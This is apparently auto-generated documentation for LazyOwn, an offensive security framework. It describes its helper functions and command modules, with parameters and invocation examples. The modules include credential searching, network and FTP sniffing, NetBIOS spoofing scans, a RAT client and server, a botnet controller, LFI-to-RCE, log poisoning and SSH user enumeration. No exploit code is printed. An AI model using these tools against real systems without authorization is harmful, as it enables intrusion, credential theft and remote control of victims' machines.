Este proyecto está licenciado bajo la Licencia GPL v3. La información contenida en GTFOBins es propiedad de sus autores, a quienes se les agradece enormemente por la información proporcionada.

Agradecimientos

Un agradecimiento especial a GTFOBins por la valiosa información que proporcionan y a ti por utilizar este proyecto. Tambien ¡Gracias por tu apoyo Tito S4vitar! quien hace una tarea extraordinarìa de divulgaciòn. por supuesto que utilizo la funcion extractPorts en mi .zshrc :D

Agradecimientos a pwntomate 🍅

una excelente herramienta que adapte un poco para que funcione con el proyecto todos los creditos son de su autor honze-net Andreas Hontzia visiten y denle amor al proyecto https://github.com/honze-net/pwntomate

Abstract

LazyOwn es un marco de trabajo que agiliza el flujo del mismo y automatiza muchas tareas y pruebas mediante alias y distintas herramientas es como una navaja multiproposito con navajas multipropisitos para el hacking xD

Documentation by readmeneitor.py

Documentación creada automaticamente por el script readmeneitor.py creado para este proyecto, quizas algún día tenga su propio repo por ahora no lo veo necesario.

UTILS.md Documentation by readmeneitor.py

load_version

No description available.

print_error

Prints an error message to the console.

This function takes an error message as input and prints it to the console
with a specific format to indicate that it is an error.

:param error: The error message to be printed.
:type error: str
:return: None

print_msg

Prints a message to the console.

This function takes a message as input and prints it to the console
with a specific format to indicate that it is an informational message.

:param msg: The message to be printed.
:type msg: str
:return: None

print_warn

Prints a warning message to the console.

This function takes a warning message as input and prints it to the console
with a specific format to indicate that it is a warning.

:param warn: The warning message to be printed.
:type warn: str
:return: None

signal_handler

Handles signals such as Control + C and shows a message on how to exit.

This function is used to handle signals like Control + C (SIGINT) and prints
a warning message instructing the user on how to exit the program using the
commands 'exit', 'q', or 'qa'.

:param sig: The signal number.
:type sig: int
:param frame: The current stack frame.
:type frame: frame
:return: None

check_rhost

Checks if the remote host (rhost) is defined and shows an error message if it is not.

This function verifies if the rhost parameter is set. If it is not defined,
an error message is printed, providing an example and directing the user to
additional help.

:param rhost: The remote host to be checked.
:type rhost: str
:return: True if rhost is defined, False otherwise.
:rtype: bool

check_lhost

Checks if the local host (lhost) is defined and shows an error message if it is not.

This function verifies if the lhost parameter is set. If it is not defined,
an error message is printed, providing an example and directing the user to
additional help.

:param lhost: The local host to be checked.
:type lhost: str
:return: True if lhost is defined, False otherwise.
:rtype: bool

check_lport

Checks if the local port (lport) is defined and shows an error message if it is not.

This function verifies if the lport parameter is set. If it is not defined,
an error message is printed, providing an example and directing the user to
additional help.

:param lport: The local port to be checked.
:type lport: int or str
:return: True if lport is defined, False otherwise.
:rtype: bool

is_binary_present

Internal function to verify if a binary is present on the operating system.

This function checks if a specified binary is available in the system's PATH
by using the which command. It returns True if the binary is found and False
otherwise.

:param binary_name: The name of the binary to be checked.
:type binary_name: str
:return: True if the binary is present, False otherwise.
:rtype: bool

handle_multiple_rhosts

Internal function to handle multiple remote hosts (rhost) for operations.

This function is a decorator that allows an operation to be performed across
multiple remote hosts specified in self.params["rhost"]. It converts a single
remote host into a list if necessary, and then iterates over each host,
performing the given function with each host. After the operation, it restores
the original remote host value.

:param func: The function to be decorated and executed for each remote host.
:type func: function
:return: The decorated function.
:rtype: function

check_sudo

Checks if the script is running with superuser (sudo) privileges, and if not,
restarts the script with sudo privileges.

This function verifies if the script is being executed with root privileges
by checking the effective user ID. If the script is not running as root,
it prints a warning message and restarts the script using sudo.

:return: None

activate_virtualenv

Activates a virtual environment and starts an interactive shell.

This function activates a virtual environment located at venv_path and then
launches an interactive bash shell with the virtual environment activated.

:param venv_path: The path to the virtual environment directory.
:type venv_path: str
:return: None

parse_proc_net_file

Internal function to parse a /proc/net file and extract network ports.

This function reads a file specified by file_path, processes each line to
extract local addresses and ports, and converts them from hexadecimal to decimal.
The IP addresses are converted from hexadecimal format to standard dot-decimal
notation. The function returns a list of tuples, each containing an IP address
and a port number.

:param file_path: The path to the /proc/net file to be parsed.
:type file_path: str
:return: A list of tuples, each containing an IP address and a port number.
:rtype: list of tuple

get_open_ports

Internal function to get open TCP and UDP ports on the operating system.

This function uses the parse_proc_net_file function to extract open TCP and UDP
ports from the corresponding /proc/net files. It returns two lists: one for TCP
ports and one for UDP ports.

:return: A tuple containing two lists: the first list with open TCP ports and
the second list with open UDP ports.
:rtype: tuple of (list of tuple, list of tuple)

find_credentials

Searches for potential credentials in files within the specified directory.

This function uses a regular expression to find possible credentials such as
passwords, secrets, API keys, and tokens in files within the given directory.
It iterates through all files in the directory and prints any matches found.

:param directory: The directory to search for files containing credentials.
:type directory: str
:return: None

rotate_char

Internal function to rotate characters for ROT cipher.

This function takes a character and a shift value, and rotates the character
by the specified shift amount. It only affects alphabetical characters, leaving
non-alphabetical characters unchanged.

:param c: The character to be rotated.
:type c: str
:param shift: The number of positions to shift the character.
:type shift: int
:return: The rotated character.
:rtype: str

get_network_info

Retrieves network interface information with their associated IP addresses.

This function executes a shell command to gather network interface details,
parses the output to extract interface names and their corresponding IP addresses,
and returns this information in a dictionary format. The dictionary keys are
interface names, and the values are IP addresses.

:return: A dictionary where the keys are network interface names and the values
are their associated IP addresses.
:rtype: dict

getprompt

Generate a command prompt string with network information and user status.

:param: None

:returns: A string representing the command prompt with network information and user status.

Manual execution:
To manually get a prompt string with network information and user status, ensure you have get_network_info() implemented to return a dictionary of network interfaces and their IPs. Then use the function to create a prompt string based on the current user and network info.

Example:
If the function get_network_info() returns:
{
'tun0': '10.0.0.1',
'eth0': '192.168.1.2'
}

And the user is root, the prompt string generated might be:
[LazyOwn👽10.0.0.1]#
If the user is not root, it would be:
[LazyOwn👽10.0.0.1]$

If no 'tun' interface is found, the function will use the first available IP or fallback to '127.0.0.1'.

copy2clip

Copia el texto proporcionado al portapapeles usando xclip.

Args:
text (str): El texto que se desea copiar al portapapeles.

Example:
copy2clip("Hello, World!")

wrapper

internal wrapper of internal function to implement multiples rhost to operate.

COMMANDS.md Documentation by readmeneitor.py

xor_encrypt_decrypt

XOR Encrypt or Decrypt data with a given key

init

Initializer for the LazyOwnShell class.

This method sets up the initial parameters and scripts for an instance of
the LazyOwnShell class. It initializes a dictionary of parameters with default
values and a list of script names that are part of the LazyOwnShell toolkit.

Attributes:
params (dict): A dictionary of parameters with their default values.
scripts (list): A list of script names included in the toolkit.
output (str): An empty string to store output or results.

default

Handles undefined commands, including aliases.

This method checks if a given command (or its alias) exists within the class
by attempting to find a corresponding method. If the command or alias is not
found, it prints an error message.

:param line: The command or alias to be handled.
:type line: str
:return: None

one_cmd

Internal function to execute commands.

This method attempts to execute a given command using onecmd and captures
the output. It sets the output attribute based on whether the command was
executed successfully or an exception occurred.

:param command: The command to be executed.
:type command: str
:return: A message indicating the result of the command execution.
:rtype: str

emptyline

Handle the case where the user enters an empty line.

This method is called when the user submits an empty line of input in
the command-line interface. By default, it provides feedback indicating
that no command was entered.

It is useful for providing user-friendly messages or handling empty input
cases in a custom manner.

License: This function is part of a program released under the GNU General
Public License v3.0 (GPLv3). You can redistribute it and/or modify it
under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is called by the cmd library when an empty line is
entered. You can override it in a subclass to change its behavior.

Example:
>>> shell = LazyOwnShell()
>>> shell.emptyline()
You didn't enter any command.

EOF

Handle the end-of-file (EOF) condition.

This method is called when the user sends an end-of-file (EOF) signal
by pressing Ctrl+D. It is typically used to handle cleanup or exit
operations when the user terminates input.

In this implementation, it prints a farewell message and returns True
to indicate that the shell should exit.

License: This function is part of a program released under the GNU General
Public License v3.0 (GPLv3). You can redistribute it and/or modify it
under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is a part of the cmd library's command handling
system. You can override it in a subclass to customize its behavior.

Example:
>>> shell = LazyOwnShell()
>>> shell.do_EOF(None)
LazyOwn say Goodbye!
(shell exits)

postloop

Handle operations to perform after exiting the command loop.

This method is called after the command loop terminates, typically used
for performing any final cleanup or displaying messages before the program
exits.

In this implementation, it prints a message indicating that the custom
shell is exiting.

License: This function is part of a program released under the GNU General
Public License v3.0 (GPLv3). You can redistribute it and/or modify it
under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is called automatically by the cmd library's command
loop after the loop terminates. You can override it in a subclass to
customize its behavior.

Example:
>>> shell = LazyOwnShell()
>>> shell.cmdloop() # Exits the command loop
Exiting custom LazyOwnShell.

set

Set a parameter value.

This function takes a line of input, splits it into a parameter and a value,
and sets the specified parameter to the given value if the parameter exists.

:param line: A string containing the parameter and value to be set.
Expected format: ' '.
:type line: str
:return: None
:raises: ValueError if the input line does not contain exactly two elements.

show

Show the current parameter values.

This function iterates through the current parameters and their values,
printing each parameter and its associated value.

:param line: This parameter is not used in the function.
:type line: str
:return: None

list

Lists all available scripts in the modules directory.

This method prints a list of available scripts in a formatted manner, arranging
them into columns. It shows each script with sufficient spacing for readability.

:param line: This parameter is not used in the method.
:type line: str
:return: None

run

Runs a specific LazyOwn script.

This method executes a script from the LazyOwn toolkit based on the provided
script name. If the script is not recognized, it prints an error message.
To see available scripts, use the list or help list commands.

:param line: The command line input containing the script name.
:type line: str
:return: None

lazysearch

Runs the internal module modules/lazysearch.py.

This method executes the lazysearch script from the specified path, using
the binary_name parameter from the self.params dictionary. If binary_name
is not set, it prints an error message.

:return: None

lazysearch_gui

Run the internal module located at modules/LazyOwnExplorer.py.

This method executes the LazyOwnExplorer.py script, which is used for graphical user interface (GUI) functionality within the LazyOwn framework.

The function performs the following steps:

1. Calls self.run_script with LazyOwnExplorer.py to execute the GUI module.

:returns: None

Manual execution:

1. Ensure that the modules/LazyOwnExplorer.py script is present in the modules directory.
2. Run the script with:
   python3 modules/LazyOwnExplorer.py

Example:
To run LazyOwnExplorer.py directly, execute:
python3 modules/LazyOwnExplorer.py

Note:
- Ensure that the script has the appropriate permissions and dependencies to run.
- Verify that your environment supports GUI operations if using this script in a non-graphical environment.

lazyown

Run the internal module located at modules/lazyown.py.

This method executes the lazyown.py script, which is a core component of the LazyOwn framework.

The function performs the following steps:

1. Calls self.run_script with lazyown.py to execute the script.

:returns: None

Manual execution:

1. Ensure that the modules/lazyown.py script is present in the modules directory.
2. Run the script with:
   python3 modules/lazyown.py

Example:
To run lazyown.py directly, execute:
python3 modules/lazyown.py

Note:
- Ensure that the script has the appropriate permissions and dependencies to run.

update_db

Run the internal module located at modules/update_db.sh.

This method executes the update_db.sh script to update the database of binary exploitables from gtofbins.

The function performs the following steps:

1. Executes the update_db.sh script located in the modules directory using os.system.

:returns: None

Manual execution:

1. Ensure that the modules/update_db.sh script is present in the modules directory.
2. Run the script with:
   ./modules/update_db.sh

Example:
To manually update the database, execute:
./modules/update_db.sh

Note:
- Ensure that the script has execute permissions.
- The script should be run with the necessary privileges if required.

lazynmap

Runs the internal module modules/lazynmap.sh for multiple Nmap scans.

This method executes the lazynmap script, using the current working directory
and the rhost parameter from the self.params dictionary as the target IP.
If rhost is not set, it prints an error message.

:return: None

lazywerkzeugdebug

Run the internal module located at modules/lazywerkzeug.py in debug mode.

This method executes the lazywerkzeug.py script with the specified parameters for remote and local hosts and ports. It is used to test Werkzeug in debug mode.

The function performs the following steps:

1. Retrieves the rhost, lhost, rport, and lport values from self.params.
2. Checks if all required parameters are set. If not, prints an error message and returns.
3. Calls self.run_script with lazywerkzeug.py and the specified parameters.

:param rhost: The remote host address.
:type rhost: str

:param lhost: The local host address.
:type lhost: str

:param rport: The remote port number.
:type rport: int

:param lport: The local port number.
:type lport: int

:returns: None

Manual execution:

1. Ensure that rhost, lhost, rport, and lport are set in self.params.
2. The script modules/lazywerkzeug.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazywerkzeug.py <rhost> <rport> <lhost> <lport>

Example:
To run lazywerkzeug.py with rhost set to "127.0.0.1", rport to 5000, lhost to "localhost", and lport to 8000, set:
self.params["rhost"] = "127.0.0.1"
self.params["rport"] = 5000
self.params["lhost"] = "localhost"
self.params["lport"] = 8000
Then call:
run_lazywerkzeugdebug()

Note:
- Ensure that modules/lazywerkzeug.py has the appropriate permissions and dependencies to run.
- Verify that the specified hosts and ports are correct and available.

lazygath

Run the internal module located at modules/lazygat.sh. to gathering the sistem :)

This method executes the lazygat.sh script located in the modules directory with sudo privileges.

The function performs the following steps:

1. Retrieves the current working directory.
2. Executes the lazygat.sh script using sudo to ensure it runs with elevated permissions.

:returns: None

Manual execution:

1. Ensure that the modules/lazygat.sh script is present in the modules directory.
2. Run the script with:
   sudo ./modules/lazygat.sh

Example:
To manually run the script with elevated privileges, execute:
sudo ./modules/lazygat.sh

Note:
- Ensure that the script has execute permissions.
- The script should be run with sudo if it requires elevated privileges.

lazynmapdiscovery

Runs the internal module modules/lazynmap.sh with discovery mode.

This method executes the lazynmap script in discovery mode. It uses the current
working directory for locating the script.

:return: None

lazysniff

Run the sniffer internal module located at modules/lazysniff.py with the specified parameters.

This method executes the script with the following arguments:

• device: The network interface to be used for sniffing, specified in self.params.

The function performs the following steps:

1. Retrieves the device value from self.params.
2. Sets up the environment variables LANG and TERM to ensure proper script execution.
3. Uses subprocess.run to execute the lazysniff.py script with the -i option to specify the network interface.

:param device: The network interface to be used for sniffing.
:type device: str

:returns: None

Manual execution:

1. Ensure that device is set in self.params.
2. The script modules/lazysniff.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazysniff.py -i <device>

Example:
To run lazysniff with device set to "eth0", set:
self.params["device"] = "eth0"
Then call:
run_lazysniff()

Note:
- Ensure that modules/lazysniff.py has the appropriate permissions and dependencies to run.
- Ensure that the network interface specified is valid and properly configured.

lazyftpsniff

Run the sniffer ftp internal module located at modules/lazyftpsniff.py with the specified parameters.

This function executes the script with the following arguments:

• device: The network interface to be used for sniffing, specified in self.params.

The function performs the following steps:

1. Retrieves the device value from self.params.
2. Sets up the environment variables LANG and TERM to ensure proper script execution.
3. Uses subprocess.run to execute the lazyftpsniff.py script with the -i option to specify the network interface.

:param device: The network interface to be used for sniffing.
:type device: str

:returns: None

Manual execution:

1. Ensure that device is set in self.params.
2. The script modules/lazyftpsniff.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazyftpsniff.py -i <device>

Example:
To run lazyftpsniff with device set to "eth0", set:
self.params["device"] = "eth0"
Then call:
run_lazyftpsniff()

Note:
- Ensure that modules/lazyftpsniff.py has the appropriate permissions and dependencies to run.
- Ensure that the network interface specified is valid and properly configured.

lazynetbios

Run the internal module to search netbios vuln victims, located at modules/lazynetbios.py with the specified parameters.

This function executes the script with the following arguments:

• startip: The starting IP address for the NetBIOS scan, specified in self.params.
• endip: The ending IP address for the NetBIOS scan, specified in self.params.
• spoof_ip: The IP address to be used for spoofing, specified in self.params.

The function performs the following steps:

1. Retrieves the startip, endip, and spoof_ip values from self.params.
2. Uses subprocess.run to execute the lazynetbios.py script with the specified parameters.

:param startip: The starting IP address for the NetBIOS scan.
:type startip: str

:param endip: The ending IP address for the NetBIOS scan.
:type endip: str

:param spoof_ip: The IP address to be used for spoofing.
:type spoof_ip: str

:returns: None

Manual execution:

1. Ensure that startip, endip, and spoof_ip are set in self.params.
2. The script modules/lazynetbios.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazynetbios.py <startip> <endip> <spoof_ip>

Example:
To run lazynetbios with startip set to "192.168.1.1", endip set to "192.168.1.10", and spoof_ip set to "192.168.1.100", set:
self.params["startip"] = "192.168.1.1"
self.params["endip"] = "192.168.1.10"
self.params["spoof_ip"] = "192.168.1.100"
Then call:
run_lazynetbios()

Note:
- Ensure that modules/lazynetbios.py has the appropriate permissions and dependencies to run.
- Ensure that the IP addresses are correctly set and valid for the NetBIOS scan.

lazyhoneypot

Run the internal module located at modules/lazyhoneypot.py with the specified parameters.

This function executes the script with the following arguments:

• email_from: The email address from which messages will be sent, specified in self.params.
• email_to: The recipient email address, specified in self.params.
• email_username: The username for email authentication, specified in self.params.
• email_password: The password for email authentication, specified in self.params.

The function performs the following steps:

1. Retrieves the email_from, email_to, email_username, and email_password values from self.params.
2. Calls the run_script method to execute the lazyhoneypot.py script with the provided email parameters.

:param email_from: The email address from which messages will be sent.
:type email_from: str

:param email_to: The recipient email address.
:type email_to: str

:param email_username: The username for email authentication.
:type email_username: str

:param email_password: The password for email authentication.
:type email_password: str

:returns: None

Manual execution:

1. Ensure that email_from, email_to, email_username, and email_password are set in self.params.
2. The script modules/lazyhoneypot.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazyhoneypot.py --email_from <email_from> --email_to <email_to> --email_username <email_username> --email_password <email_password>

Example:
To run lazyhoneypot with email_from set to "[email protected]", email_to set to "[email protected]", email_username set to "user", and email_password set to "pass", set:
self.params["email_from"] = "[email protected]"
self.params["email_to"] = "[email protected]"
self.params["email_username"] = "user"
self.params["email_password"] = "pass"
Then call:
run_lazyhoneypot()

Note:
- Ensure that modules/lazyhoneypot.py has the appropriate permissions and dependencies to run.
- Ensure that the email credentials are correctly set for successful authentication and operation.

lazygptcli

Run the internal module to create Oneliners with Groq AI located at modules/lazygptcli.py with the specified parameters.

This function executes the script with the following arguments:

• prompt: The prompt to be used by the script, specified in self.params.
• api_key: The API key to be set in the environment variable GROQ_API_KEY, specified in self.params.

The function performs the following steps:

1. Retrieves the prompt and api_key values from self.params.
2. Checks if both prompt and api_key are set. If either is missing, it prints an error message and returns.
3. Sets the environment variable GROQ_API_KEY with the provided api_key.
4. Calls the run_script method to execute the lazygptcli.py script with the --prompt argument.

:param prompt: The prompt to be used by the script.
:type prompt: str

:param api_key: The API key for accessing the service.
:type api_key: str

:returns: None

Manual execution:

1. Ensure that prompt and api_key are set in self.params.
2. The script modules/lazygptcli.py should be present in the modules directory.
3. Set the environment variable GROQ_API_KEY with the API key value.
4. Run the script with:
   python3 modules/lazygptcli.py --prompt <prompt>

Example:
To run lazygptcli with prompt set to "Your prompt" and api_key set to "your_api_key", set:
self.params["prompt"] = "Your prompt"
self.params["api_key"] = "your_api_key"
Then call:
run_lazygptcli()

Note:
- Ensure that modules/lazygptcli.py has the appropriate permissions and dependencies to run.
- The environment variable GROQ_API_KEY must be correctly set for the script to function.

lazysearch_bot

Run the internal module GROQ AI located at modules/lazysearch_bot.py with the specified parameters.

This function executes the script with the following arguments:

• prompt: The prompt to be used by the script, specified in self.params.
• api_key: The API key to be set in the environment variable GROQ_API_KEY, specified in self.params.

The function performs the following steps:

1. Retrieves the prompt and api_key values from self.params.
2. Checks if both prompt and api_key are set. If either is missing, it prints an error message and returns.
3. Sets the environment variable GROQ_API_KEY with the provided api_key.
4. Calls the run_script method to execute the lazysearch_bot.py script with the --prompt argument.

:param prompt: The prompt to be used by the script.
:type prompt: str

:param api_key: The API key for accessing the service.
:type api_key: str

:returns: None

Manual execution:

1. Ensure that prompt and api_key are set in self.params.
2. The script modules/lazysearch_bot.py should be present in the modules directory.
3. Set the environment variable GROQ_API_KEY with the API key value.
4. Run the script with:
   python3 modules/lazysearch_bot.py --prompt <prompt>

Example:
To run lazysearch_bot with prompt set to "Search query" and api_key set to "your_api_key", set:
self.params["prompt"] = "Search query"
self.params["api_key"] = "your_api_key"
Then call:
run_lazysearch_bot()

Note:
- Ensure that modules/lazysearch_bot.py has the appropriate permissions and dependencies to run.
- The environment variable GROQ_API_KEY must be correctly set for the script to function.

lazymetaextract0r

Run the Metadata extractor internal module located at modules/lazyown_metaextract0r.py with the specified parameters.

This function executes the script with the following arguments:

• path: The file path to be processed by the script, specified in self.params.

The function performs the following steps:

1. Retrieves the value for path from self.params.
2. Checks if the path parameter is set. If not, it prints an error message and returns.
3. Calls the run_script method to execute the lazyown_metaextract0r.py script with the appropriate argument.

:param path: The file path to be processed by the script.
:type path: str

:returns: None

Manual execution:

1. Ensure that path is set in self.params.
2. The script modules/lazyown_metaextract0r.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazyown_metaextract0r.py --path <path>

Example:
To run lazyown_metaextract0r with path set to /home/user/file.txt, set:
self.params["path"] = "/home/user/file.txt"
Then call:
run_lazymetaextract0r()

Note:
- Ensure that modules/lazyown_metaextract0r.py has the appropriate permissions and dependencies to run.

lazyownratcli

Run the internal module located at modules/lazyownclient.py with the specified parameters.

This function executes the script with the following arguments:

• lhost: The IP address of the local host, specified in self.params.
• lport: The port number of the local host, specified in self.params.
• rat_key: The RAT key, specified in self.params.

The function performs the following steps:

1. Retrieves the values for lhost, lport, and rat_key from self.params.
2. Checks if all required parameters (lhost, lport, and rat_key) are set. If any are missing, it prints an error message and returns.
3. Calls the run_script method to execute the lazyownclient.py script with the appropriate arguments.

:param lhost: The IP address of the local host.
:type lhost: str
:param lport: The port number of the local host.
:type lport: int
:param rat_key: The RAT key.
:type rat_key: str

:returns: None

Manual execution:

1. Ensure that lhost, lport, and rat_key are set in self.params.
2. The script modules/lazyownclient.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazyownclient.py --host <lhost> --port <lport> --key <rat_key>

Example:
To run lazyownclient with lhost set to 192.168.1.10, lport set to 8080, and rat_key set to my_secret_key, set:
self.params["lhost"] = "192.168.1.10"
self.params["lport"] = 8080
self.params["rat_key"] = "my_secret_key"
Then call:
run_lazyownratcli()

Note:
- Ensure that modules/lazyownclient.py has the appropriate permissions and dependencies to run.

lazyownrat

Run the internal module located at modules/lazyownserver.py with the specified parameters.

This function executes the script with the following arguments:

• rhost: The IP address of the remote host, specified in self.params.
• rport: The port number of the remote host, specified in self.params.
• rat_key: The RAT key, specified in self.params.

The function performs the following steps:

1. Retrieves the values for rhost, rport, and rat_key from self.params.
2. Checks if all required parameters (rhost, rport, and rat_key) are set. If any are missing, it prints an error message and returns.
3. Calls the run_script method to execute the lazyownserver.py script with the appropriate arguments.

:param rhost: The IP address of the remote host.
:type rhost: str
:param rport: The port number of the remote host.
:type rport: int
:param rat_key: The RAT key.
:type rat_key: str

:returns: None

Manual execution:

1. Ensure that rhost, rport, and rat_key are set in self.params.
2. The script modules/lazyownserver.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazyownserver.py --host <rhost> --port <rport> --key <rat_key>

Example:
To run lazyownserver with rhost set to 192.168.1.10, rport set to 8080, and rat_key set to my_secret_key, set:
self.params["rhost"] = "192.168.1.10"
self.params["rport"] = 8080
self.params["rat_key"] = "my_secret_key"
Then call:
run_lazyownrat()

Note:
- Ensure that modules/lazyownserver.py has the appropriate permissions and dependencies to run.

lazybotnet

Run the internal module located at modules/lazybotnet.py with the specified parameters.

This function executes the script with the following arguments:

• rhost: The IP address of the remote host, hardcoded to "0.0.0.0".
• rport: The port number of the remote host, specified in self.params.
• rat_key: The RAT key, specified in self.params.

The function performs the following steps:

1. Retrieves the values for rport and rat_key from self.params. The rhost is hardcoded to "0.0.0.0".
2. Checks if all required parameters (rport and rat_key) are set. If any are missing, it prints an error message and returns.
3. Calls the run_script method to execute the lazybotnet.py script with the appropriate arguments.

:param rport: The port number of the remote host.
:type rport: int
:param rat_key: The RAT key.
:type rat_key: str

:returns: None

Manual execution:

1. Ensure that rport and rat_key are set in self.params.
2. The script modules/lazybotnet.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazybotnet.py --host <rhost> --port <rport> --key <rat_key>

Example:
To run lazybotnet with rport set to 1234 and rat_key set to my_key, set:
self.params["rport"] = 1234
self.params["rat_key"] = "my_key"
Then call:
run_lazybotnet()

Note:
- Ensure that modules/lazybotnet.py has the appropriate permissions and dependencies to run.

lazylfi2rce

Run the internal module located at modules/lazylfi2rce.py with the specified parameters.

This function executes the script with the following arguments:

• rhost: The IP address of the remote host, specified in self.params.
• rport: The port number of the remote host, specified in self.params.
• lhost: The IP address of the local host, specified in self.params.
• lport: The port number of the local host, specified in self.params.
• field: The field name for the LFI (Local File Inclusion) attack, specified in self.params.
• wordlist: The path to the wordlist file used for the attack, specified in self.params.

The function performs the following steps:

1. Retrieves the values for rhost, rport, lhost, lport, field, and wordlist from self.params.
2. Checks if all required parameters are set. If any are missing, it prints an error message and returns.
3. Calls the run_script method to execute the lazylfi2rce.py script with the appropriate arguments.

:param rhost: The IP address of the remote host.
:type rhost: str
:param rport: The port number of the remote host.
:type rport: int
:param lhost: The IP address of the local host.
:type lhost: str
:param lport: The port number of the local host.
:type lport: int
:param field: The field name for the LFI attack.
:type field: str
:param wordlist: The path to the wordlist file.
:type wordlist: str

:returns: None

Manual execution:

1. Ensure that rhost, rport, lhost, lport, field, and wordlist are set in self.params.
2. The script modules/lazylfi2rce.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazylfi2rce.py --rhost <rhost> --rport <rport> --lhost <lhost> --lport <lport> --field <field> --wordlist <wordlist>

Example:
To run the lazylfi2rce with rhost set to 192.168.1.1, rport set to 80, lhost set to 192.168.1.2, lport set to 8080, field set to file, and wordlist set to path/to/wordlist.txt, set:
self.params["rhost"] = "192.168.1.1"
self.params["rport"] = 80
self.params["lhost"] = "192.168.1.2"
self.params["lport"] = 8080
self.params["field"] = "file"
self.params["wordlist"] = "path/to/wordlist.txt"
Then call:
run_lazylfi2rce()

Note:
- Ensure that modules/lazylfi2rce.py has the appropriate permissions and dependencies to run.

lazylogpoisoning

Run the internal module located at modules/lazylogpoisoning.py with the specified parameters.

This function executes the script with the following arguments:

• rhost: The IP address of the remote host, specified in self.params.
• lhost: The IP address of the local host, specified in self.params.

The function performs the following steps:

1. Retrieves the values for rhost and lhost from self.params.
2. Checks if the required parameters rhost and lhost are set. If not, it prints an error message and returns.
3. Calls the run_script method to execute the lazylogpoisoning.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. Must be set in self.params.
:type rhost: str
:param lhost: The IP address of the local host. Must be set in self.params.
:type lhost: str

:returns: None

Manual execution:

1. Ensure that rhost and lhost are set in self.params.
2. The script modules/lazylogpoisoning.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazylogpoisoning.py --rhost <rhost> --lhost <lhost>

Example:
To run the lazylogpoisoning with rhost set to 192.168.1.1 and lhost set to 192.168.1.2, set:
self.params["rhost"] = "192.168.1.1"
self.params["lhost"] = "192.168.1.2"
Then call:
run_lazylogpoisoning()

Note:
- Ensure that modules/lazylogpoisoning.py has the appropriate permissions and dependencies to run.

lazybotcli

Run the internal module located at modules/lazybotcli.py with the specified parameters.

This function executes the script with the following arguments:

• rhost: The IP address of the remote host (default is "0.0.0.0").
• rport: The port number to be used, specified in self.params.
• rat_key: The key for the Remote Access Tool (RAT), specified in self.params.

The function performs the following steps:

1. Retrieves the values for rport and rat_key from self.params.
2. Checks if the required parameters rport and rat_key are set. If not, it prints an error message and returns.
3. Calls the run_script method to execute the lazybotcli.py script with the appropriate arguments.

:param rport: The port number for the connection. Must be set in self.params.
:type rport: int
:param rat_key: The key for the RAT. Must be set in self.params.
:type rat_key: str

:returns: None

Manual execution:

1. Ensure that rport and rat_key are set in self.params.
2. The script modules/lazybotcli.py should be present in the modules directory.
3. Run the script with:
   python3 modules/lazybotcli.py --host 0.0.0.0 --port <rport> --key <rat_key>

Example:
To run the lazybotcli with port 12345 and key mysecretkey, set:
self.params["rport"] = 12345
self.params["rat_key"] = "mysecretkey"
Then call:
run_lazybotcli()

Note:
- Ensure that modules/lazybotcli.py has the appropriate permissions and dependencies to run.

lazyssh77enum

Run the internal module located at modules/lazybrutesshuserenum.py with the specified parameters. ONLY valid for 7.x Version !!!

The script will be executed with the following arguments:

• wordlist: The path to the wordlist file containing potential usernames for SSH enumeration.
• rhost: The target IP address or hostname for SSH enumeration.

The function performs the following steps:

1. Retrieves the values for wordlist and rhost from self.params.
2. Prints a warning message about the potential inaccuracy of the results.
3. Constructs the command to run the lazybrutesshuserenum.sh script with the specified arguments.
4. Executes the command using the os.system method.

:param wordlist: The path to the wordlist file for username enumeration. Must be set in self.params.
:type wordlist: str
:param rhost: The target IP address or hostname for SSH enumeration. Must be set in self.params.
:type rhost: str

:returns: None

Manual execution:

1. Ensure that wordlist and rhost are set in self.params.
2. Run the script modules/lazybrutesshuserenum.sh with the appropriate arguments.

Dependencies:

• modules/lazybrutesshuserenum.sh must be present in the modules directory and must be executable.

Example:
To run the SSH user enumeration with a wordlist located at /path/to/wordlist.txt and target IP 192.168.1.1, set:
self.params["usrwordlist"] = "/path/to/wordlist.txt"
self.params["rhost"] = "192.168.1.1"
Then call:
run_lazyssh77enum()

Note:
- The accuracy of the results may vary depending on the version of the script and the wordlist used.

lazyburpfuzzer

Run the internal module located at modules/lazyown_burpfuzzer.py with the specified parameters.

The script will be executed with the following arguments:

• --url: The target URL for the fuzzer.
• --method: The HTTP method to use (e.g., GET, POST).
• --proxy_port: The port for the proxy server.
• --headers: Optional HTTP headers to include in the request.
• --data: Optional data to include in the request body.
• --params: Optional URL parameters to include in the request.
• --json_data: Optional JSON data to include in the request body.
• -w: Optional wordlist for fuzzing.
• -hc: Optional hide code for fuzzing.

The function performs the following steps:

1. Retrieves the values for url, method, headers, params, data, json_data, proxy_port, wordlist, and hide_code from self.params.
2. Constructs the command to run the lazyown_burpfuzzer.py script with the specified arguments.
3. Adds optional parameters based on whether the corresponding files (headers_file, data_file, params_file, json_data_file) are provided.
4. Executes the command using the run_command method.

:param url: The target URL for the fuzzer. Must be set in self.params.
:type url: str
:param method: The HTTP method to use. Must be set in self.params.
:type method: str
:param headers: Optional HTTP headers. Must be set in self.params or provided via headers_file.
:type headers: str
:param params: Optional URL parameters. Must be set in self.params or provided via params_file.
:type params: str
:param data: Optional data for the request body. Must be set in self.params or provided via data_file.
:type data: str
:param json_data: Optional JSON data for the request body. Must be set in self.params or provided via json_data_file.
:type json_data: str
:param proxy_port: The port for the proxy server. Must be set in self.params.
:type proxy_port: int
:param wordlist: Optional wordlist for fuzzing. Must be set in self.params.
:type wordlist: str
:param hide_code: Optional code to hide. Must be set in self.params.
:type hide_code: int
:param headers_file: Optional file containing headers.
:type headers_file: str, optional
:param data_file: Optional file containing data.
:type data_file: str, optional
:param params_file: Optional file containing parameters.
:type params_file: str, optional
:param json_data_file: Optional file containing JSON data.
:type json_data_file: str, optional

:returns: None

Manual execution:

